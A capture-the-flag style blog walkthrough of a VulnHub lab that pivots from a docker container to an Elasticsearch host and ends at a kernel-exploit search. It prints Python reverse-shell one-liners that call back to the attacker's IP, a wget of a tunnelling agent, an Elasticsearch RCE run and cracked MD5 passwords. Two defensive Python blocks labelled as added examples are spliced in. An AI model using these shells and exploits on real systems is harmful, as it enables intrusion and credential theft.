title: vulhub target practice, week 1
description: vulhub target practice, week 1. Difficulty: medium
date: 2023-06-01
categories:

  • [pentesting, target machines]

If the image links are broken, see: https://qing3feng.github.io/2023/06/01/vulhub%E6%89%93%E9%9D%B6%E7%AC%AC%E4%B8%80%E5%91%A8/

vulhub target practice, week 1

After finishing all the easy HTB boxes, it is time to try the vulhub machines to level up. Thanks to @xiaoqiu for the generous help.

Download: https://www.vulnhub.com/entry/boredhackerblog-social-network,454/

Information gathering

┌──(kali㉿kali)-[~/Tools/fscan]
└─$ ./fscan -h 192.168.64.1/24
   fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.64.2    is alive
(icmp) Target 192.168.64.1    is alive
(icmp) Target 192.168.64.128  is alive
(icmp) Target 192.168.64.132  is alive
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo arp-scan -l -I eth0
Interface: eth0, type: EN10MB, MAC: 00:0c:29:bb:17:07, IPv4: 192.168.64.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.64.1    00:50:56:c0:00:08       VMware, Inc.
192.168.64.2    00:50:56:e3:65:6e       VMware, Inc.
192.168.64.132  00:0c:29:3f:6b:8f       VMware, Inc.
192.168.64.254  00:50:56:ed:bf:51       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.980 seconds (129.29 hosts/sec). 4 responded
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo nmap 192.168.64.1/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 13:31 CST
Nmap scan report for 192.168.64.1
Host is up (0.00057s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
903/tcp   open  iss-console-mgr
1086/tcp  open  cplscrambler-lg
1234/tcp  open  hotline
3306/tcp  open  mysql
5357/tcp  open  wsdapi
8080/tcp  open  http-proxy
8081/tcp  open  blackice-icecap
9000/tcp  open  cslistener
9200/tcp  open  wap-wsp
10002/tcp open  documentum
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.64.2
Host is up (0.00018s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:E3:65:6E (VMware)

Nmap scan report for 192.168.64.132
Host is up (0.00045s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
MAC Address: 00:0C:29:3F:6B:8F (VMware)

Nmap scan report for 192.168.64.254
Host is up (0.00018s latency).
All 1000 scanned ports on 192.168.64.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:ED:BF:51 (VMware)

Nmap scan report for 192.168.64.128
Host is up (0.0000030s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 256 IP addresses (5 hosts up) scanned in 7.79 seconds

The three tools give slightly different results, but all of them show the target machine 192.168.64.132.

We can use nmap for further information gathering:

┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo nmap --min-rate 10000 192.168.64.132
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 13:36 CST
Nmap scan report for 192.168.64.132
Host is up (0.00071s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
MAC Address: 00:0C:29:3F:6B:8F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

Only port 5000 looks usable; let's visit it:

[Screenshot: https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601133912-1yivvba.png]

A quick test turned up no obvious common vulnerabilities, so we gather more information about this site.

Directory brute-forcing

Since the target is an IP address, we skip subdomain enumeration.

Let's brute-force its directories:

Three directory-scanning tools are all worth trying:

python dirsearch.py -u http://192.168.64.132:5000/
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 100 -mc 200,301 -u http://192.168.64.132:5000/FUZZ
gobuster dir -u http://192.168.64.132:5000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Prerequisites:
# 1. seclists wordlists --> install with: sudo apt install seclists
#
# 2. dirsearch --> method 1: type dirsearch and accept the default install; afterwards use it as a command
#                  method 2: git clone https://github.com/maurosoria/dirsearch
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 100 -mc 200,301 -u http://192.168.64.132:5000/FUZZ
       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.64.132:5000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200,301
________________________________________________

[Status: 200, Size: 401, Words: 28, Lines: 20, Duration: 94ms]
    * FUZZ: admin
:: Progress: [100/26584] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] ::
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ gobuster dir -u http://192.168.64.132:5000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.64.132:5000/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/06/01 13:43:27 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 200) [Size: 401]
┌──(kali㉿kali)-[~/Tools/dirsearch]
└─$ sudo python dirsearch.py -u http://192.168.64.132:5000/
  v0.4.3
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11710

Output: /home/kali/Tools/dirsearch/reports/http_192.168.64.132_5000/__23-06-01_13-44-06.txt

Target: http://192.168.64.132:5000/

[13:44:06] Starting:
[13:44:40] 200 -  401B  - /admin

gobuster and dirsearch are the friendlier ones, so I recommend those two. gobuster also supports subdomain enumeration; see the commands in qing3feng.github.io/2023…

getshell

We found that /admin is usable; let's take a look.

[Screenshot: https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601135120-nbic7kf.png]

It turns out to be a code-execution page: whatever we enter is passed to exec and executed.

Write a reverse shell:

Either of the following works:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.64.128",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.64.128",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
┌──(kali㉿kali)-[~/Tools/dirsearch]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.64.128] from (UNKNOWN) [192.168.64.132] 43205
/app # ls /
ls /
app    dev    home   media  proc   run    srv    tmp    var
bin    etc    lib    mnt    root   sbin   sys    usr
/app # whoami
whoami
root

We are already root, so no privilege escalation is needed.

Check the network interfaces:

/app # ifconfig
ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:217054 errors:0 dropped:0 overruns:0 frame:0
          TX packets:215883 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:21519988 (20.5 MiB)  TX bytes:30322971 (28.9 MiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

There is only a 172.17 network here, yet we came in through the 192.168 network and ended up on a 172.17 machine. This strongly suggests we are inside a docker container on 192.168.64.132. We can run cat /proc/1/cgroup to check whether that guess is right:

/app # cat /proc/1/cgroup
11:hugetlb:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
10:perf_event:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
9:blkio:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
8:freezer:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
7:devices:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
6:memory:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
5:cpuacct:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
4:cpu:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
3:cpuset:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
2:name=systemd:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481

When every entry ends in a /docker/ path followed by a long hex string like this, we can be sure it is docker.

Compare with our local kali host:

┌──(kali㉿kali)-[/var/www/html]
└─$ cat /proc/1/cgroup
0::/init.scope
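The cgroup comparison above can be done programmatically, which is the same check an incident responder or a monitoring agent uses to tell a container from its host. This Python is an added example, not code from the original post: it parses the text of /proc/1/cgroup and extracts the 64-hex docker container id from the cgroup v1 path seen above; the cgroup v2 form (docker-<id>.scope under the systemd driver) and its sample id are assumptions.

```python
import re
from pathlib import Path

# Constructed sample: three of the cgroup v1 lines seen inside the container above.
CONTAINER_CGROUP_V1 = """\
11:hugetlb:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
10:perf_event:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
2:name=systemd:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
"""

# Constructed sample: the cgroup v2 line seen on the kali host above.
HOST_CGROUP_V2 = "0::/init.scope\n"

# Constructed sample (assumption): the cgroup v2 path docker produces under the systemd cgroup driver.
CONTAINER_CGROUP_V2 = (
    "0::/system.slice/docker-"
    "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef.scope\n"
)

# v1 form: ".../docker/<64 hex>"    v2 + systemd form: ".../docker-<64 hex>.scope"
_DOCKER_PATH = re.compile(r"/docker[/-]([0-9a-f]{64})(?:\.scope)?$")


def container_id_from_cgroup(text):
    """Return the 64-hex docker container id named by any line of a /proc/<pid>/cgroup file, else None."""
    for line in text.splitlines():
        # Each line is "<hierarchy-id>:<controllers>:<path>"; split at most twice so a ':' in the path survives.
        fields = line.split(":", 2)
        if len(fields) != 3:
            continue
        match = _DOCKER_PATH.search(fields[2].rstrip())
        if match:
            return match.group(1)
    return None


def docker_evidence(cgroup_text, dockerenv_exists):
    """Combine the two cheap checks: the cgroup path and the /.dockerenv marker file."""
    cid = container_id_from_cgroup(cgroup_text)
    if cid:
        # The first 12 hex chars are what docker shows as the short id (and used as the hostname above).
        return f"docker container {cid[:12]} (cgroup path)"
    if dockerenv_exists:
        return "docker container (/.dockerenv present, cgroup path not conclusive)"
    return "no docker evidence"


def main():
    try:
        text = Path("/proc/1/cgroup").read_text()
    except OSError:
        text = ""
    print(docker_evidence(text, Path("/.dockerenv").exists()))


if __name__ == "__main__":
    main()
```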

Next comes the question of how to get out of the docker container.

So we need to scan the subnet, but this docker container has no scanning tools available; the simplest option is a shell one-liner:

/app # for i in $(seq 1 10);do ping -c 1 172.17.0.$i|grep ttl;done
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.039 ms
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.021 ms
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.036 ms

Three hosts replied.

Building a tunnel

For deeper probing we would rather use the full toolset, so we set up a tunnel and scan with the tools on our local kali.

How do we build the tunnel? Here we use Venom.

┌──(kali㉿kali)-[~/Tools]
└─$ git clone https://github.com/Dliv3/Venom

After cloning, enter the directory and build it:

┌──(kali㉿kali)-[~/Tools/Venom]
└─$ ./build.sh
build macos x64 admin & agent...
go: downloading github.com/cheggaaa/pb/v3 v3.0.1
go: downloading golang.org/x/crypto v0.0.0-20190911031432-227b76d455e7
go: downloading github.com/libp2p/go-reuseport v0.0.1
go: downloading github.com/fatih/color v1.7.0
go: downloading github.com/VividCortex/ewma v1.1.1
go: downloading github.com/mattn/go-colorable v0.1.2
go: downloading github.com/mattn/go-isatty v0.0.8
go: downloading github.com/mattn/go-runewidth v0.0.4
go: downloading golang.org/x/sys v0.0.0-20190412213103-97732733099d
build linux x64 admin & agent...
build linux x86 admin & agent...
build windows x86 admin & agent...
build arm eabi5 agent...
build mipsel agent..

Go into the release directory and start a local http server so the docker container can download the agent that will connect back to us.

First check the container's architecture and kernel version:

/app # cat /proc/version
Linux version 3.13.0-24-generic (buildd@panlong) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014
/app # uname -a
Linux 755411217bdd 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 Linux

It is 64-bit.

In the Venom/release directory, start a web server with python:

┌──(kali㉿kali)-[~/Tools/Venom/release]
└─$ python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

Download the agent on the target:

/app # wget 192.168.64.128:8888/agent_linux_x64
Connecting to 192.168.64.128:8888 (192.168.64.128:8888)
agent_linux_x64      100% |*******************************|  3564k  0:00:00 ETA

Start the listener on kali:

┌──(kali㉿kali)-[~/Tools/Venom/release]
└─$ ./admin_linux_x64 -lport 2333
Venom Admin Node Start...
{ v1.1 author: Dlive }

Connect the target back to kali:

/app # ./agent_linux_x64 -rhost 192.168.64.128 -rport 2333
./agent_linux_x64 -rhost 192.168.64.128 -rport 2333
2023/06/01 06:45:18 [+]Successfully connects to a new node

Once connected, use show to view the connected nodes:

[Screenshot: https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601192857-7d55eso.png]

Use goto 1 to enter that node.

From that node we can start a socks5 proxy.

[Screenshot: https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601193058-hd3jrd8.png]

Then use proxychains on our local kali to go through this socks proxy:

┌──(kali㉿kali)-[~/桌面]
└─$ sudo gedit /etc/proxychains4.conf

[Screenshot: https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601193233-jy5kae1.png]

With the proxy configured, we can start information gathering.

Lateral movement

From the earlier information gathering we know that the docker container we already control is 172.17.0.2.

/app # for i in $(seq 1 10);do ping -c 1 172.17.0.$i|grep ttl;done
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.039 ms
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.021 ms
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.036 ms

That leaves 172.17.0.3 and 172.17.0.1.

┌──(kali㉿kali)-[~/桌面]
└─$ proxychains nmap -sT -Pn 172.17.0.1
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
┌──(kali㉿kali)-[~/桌面]
└─$ proxychains nmap -sT -Pn 172.17.0.3
Nmap scan report for 172.17.0.3
Host is up (0.025s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT     STATE SERVICE
9200/tcp open  wap-wsp

Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds

The scan of 172.17.0.1 shows the same open ports (22 and 5000) as the 192.168.64.132 we saw earlier, so it is most likely the gateway, i.e. the docker host.

Probe 172.17.0.3 in more detail:

┌──(kali㉿kali)-[~/桌面]
└─$ proxychains nmap -sT -sV -p 9200 172.17.0.3
PORT     STATE SERVICE VERSION
9200/tcp open  http    Elasticsearch REST API 1.4.2 (name: Brain Cell; cluster: elasticsearch; Lucene 4.10.2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.92 seconds

It is Elasticsearch; let's check whether there is a usable n-day:

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Elasticsearch
------------------------------------------ ---------------------------------
 Exploit Title                            |  Path
------------------------------------------ ---------------------------------
ElasticSearch - Remote Code Execution     | linux/remote/36337.py
ElasticSearch - Remote Code Execution     | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Byp | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Down | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure  | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directo | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary  | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Data | multiple/webapps/50152.py
------------------------------------------ ---------------------------------
Shellcodes: No Results

Some of these may apply; we try the RCE one first:

[Screenshot: https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601195524-zfpsxwd.png]

Its help text is shown above; we run the command:

┌──(kali㉿kali)-[~/HTB/week1]
└─$ proxychains python2 36337.py 172.17.0.3
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Exploit for ElasticSearch , CVE-2015-1427   Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
[proxychains] Strict chain  ...  192.168.64.128:10001  ...  172.17.0.3:9200  ...  OK
bin
boot
dev
elasticsearch
elasticsearch-1.4.2.tar.gz
etc
home
lib
lib64
main.sh
media
mnt
opt
passwords
proc
root
run

It executes successfully; remember to prefix the command with proxychains.

There is a passwords file; let's look at it:

~$ cat passwords
[proxychains] Strict chain  ...  192.168.64.128:10001  ...  172.17.0.3:9200  ...  OK
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b

These look like MD5; look them up with an online tool:

[Screenshot: https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601195857-8rzdc79.png]

It resolves to 1337hack.

john:1337hack
test:1234test
admin:1111pass
root:1234pass
jane:1234jane

These are the recovered credentials, but only john can log in:

┌──(kali㉿kali)-[~/HTB/week1]
└─$ ssh john@192.168.64.132
The authenticity of host '192.168.64.132 (192.168.64.132)' can't be established.
ED25519 key fingerprint is SHA256:JZd5+gaOpg7shDrwi9MncScWvVqsSRB4+LpUUrRP3yo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.64.132' (ED25519) to the list of known hosts.
john@192.168.64.132's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

System information disabled due to load higher than 1.0

Last login: Thu Jun  1 01:27:18 2023
john@socnet:~$
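The passwords file above stores unsalted MD5 of passwords drawn from a tiny fixed format, which is why an online lookup recovers them instantly and why reused passwords (1234pass, 1234jane) are so cheap to confirm. This Python is an added example, not code from the original post: it parses that file, flags the bare 32-hex digests, sizes the keyspace the Format line admits, and shows the salted slow-KDF storage that should have been used instead; the PBKDF2 parameters are my assumptions.

```python
import hashlib
import hmac
import os
import re

# Constructed sample: the passwords file recovered from the Elasticsearch container above.
PASSWORDS_FILE = """\
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
"""

_HEX32 = re.compile(r"^[0-9a-f]{32}$")
# Assumed hardening parameters: PBKDF2-HMAC-SHA256, 16-byte random salt, 200k iterations.
PBKDF2_ITERATIONS = 200_000


def parse_passwords_file(text):
    """Return {user: stored_value} from the 'user:value' lines, skipping the Format/Example header."""
    entries = {}
    for line in text.splitlines():
        if line.startswith(("Format:", "Example:")) or ":" not in line:
            continue
        user, value = line.split(":", 1)
        entries[user.strip()] = value.strip().lower()
    return entries


def unsalted_md5_users(entries):
    """Users whose stored value is a bare 32-hex digest: MD5-sized, no salt, no algorithm tag."""
    return sorted(user for user, value in entries.items() if _HEX32.match(value))


def keyspace_size(digits=4, letters=4):
    """Passwords possible under the stated 'dddd' + 'llll' format: 10^4 * 26^4."""
    return (10 ** digits) * (26 ** letters)


def weak_hash(password):
    """What the target did: plain MD5 with no salt, so equal passwords share a digest across every user."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password, salt=None):
    """Hardened form: per-user random salt plus a slow KDF, stored together with its parameters."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(stored, password):
    """Recompute from the stored parameters; the constant-time compare avoids a timing side channel."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    except ValueError:
        return False
    return hmac.compare_digest(dk.hex(), dk_hex)


def main():
    entries = parse_passwords_file(PASSWORDS_FILE)
    print("unsalted MD5-sized hashes for:", ", ".join(unsalted_md5_users(entries)))
    print("keyspace under the stated format:", keyspace_size())
    stored = hash_password("1337hack")  # the john password recovered above
    print("hardened record:", stored)
    print("verify correct:", verify_password(stored, "1337hack"),
          "verify wrong:", verify_password(stored, "1337hacx"))


if __name__ == "__main__":
    main()
```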

Privilege escalation

Neither of the two usual methods gets us anywhere:

john@socnet:~$ find / -perm -type f 2 > /dev/null
find: invalid mode `-type'
john@socnet:~$ sudo -l
[sudo] password for john:
Sorry, user john may not run sudo on socnet.

So the only option left is a kernel exploit.

john@socnet:~$ uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

The kernel version is pitifully old: the latest kernel is already at 5.17, and being two major versions behind is actually a huge gap.

Search for kernel privilege-escalation exploits for linux 3.13:

┌──(kali㉿kali)-[~]
└─$ searchsploit linux 3.13
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)                          | linux/remote/42697.rb
Alienvault Open Source SIEM (OSSIM) < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution                            | linux/remote/33805.pl
Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)                               | linux/remote/42695.rb
AppArmor securityfs < 4.8 - 'aa_fs_seq_hash_show' Reference Count Leak                                                     | linux/dos/40181.c
CyberArk < 10 - Memory Disclosure                                                                                          | linux/remote/44829.py
CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure                                                                   | linux/dos/44428.txt
Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution                                                               | linux/local/44920.txt
Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution                                                               | linux/local/44920.txt
Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution                                                              | linux/remote/44921.txt
Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution                                                              | linux/remote/44921.txt
Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read                                                            | linux/local/44688.txt
DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit)                                                                   | linux/webapps/42769.rb
Exim < 4.86.2 - Local Privilege Escalation                                                                                 | linux/local/39549.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution                                                                            | linux/remote/44571.py
Gnome Web (Epiphany) < 3.28.2.1 - Denial of Service                                                                        | linux/dos/44857.html
id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 - Command Execution                      | linux/remote/19079.c
Jfrog Artifactory < 4.16 - Arbitrary File Upload / Remote Command Execution                                                | linux/webapps/44543.txt
KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception                                                                  | linux/dos/2954.html
LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure                                                       | linux/remote/44022.md
Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module                                             | linux/dos/46477.txt
Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall                     | linux/dos/44641.c
Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem                                      | linux/dos/46502.txt
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation                                                  | solaris/local/15962.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation                                                          | linux/local/50135.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)         | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)            | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                               | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)         | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)                                | linux/local/40611.c
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation                                 | linux/local/41995.c
Linux Kernel 3.13 - SGID Privilege Escalation                                                                              | linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation                       | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)  | linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit)                                                   | linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service                                           | linux/dos/36743.c
Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation                             | linux_x86-64/local/33516.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3)                     | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)                                            | linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)                                                                      | linux/dos/31305.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                                                       | linux/dos/43234.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                                                                 | linux/local/41886.c
Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation                                                          | linux/local/34923.c
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation                                               | linux_x86-64/local/44302.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service                                               | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation                                                               | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation                                          | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)                                                                    | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                              | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service                                                                          | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak                                                                   | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption                                                       | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free                                                                             | linux/dos/44579.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                                     | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation                          | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)                      | linux/local/43418.c
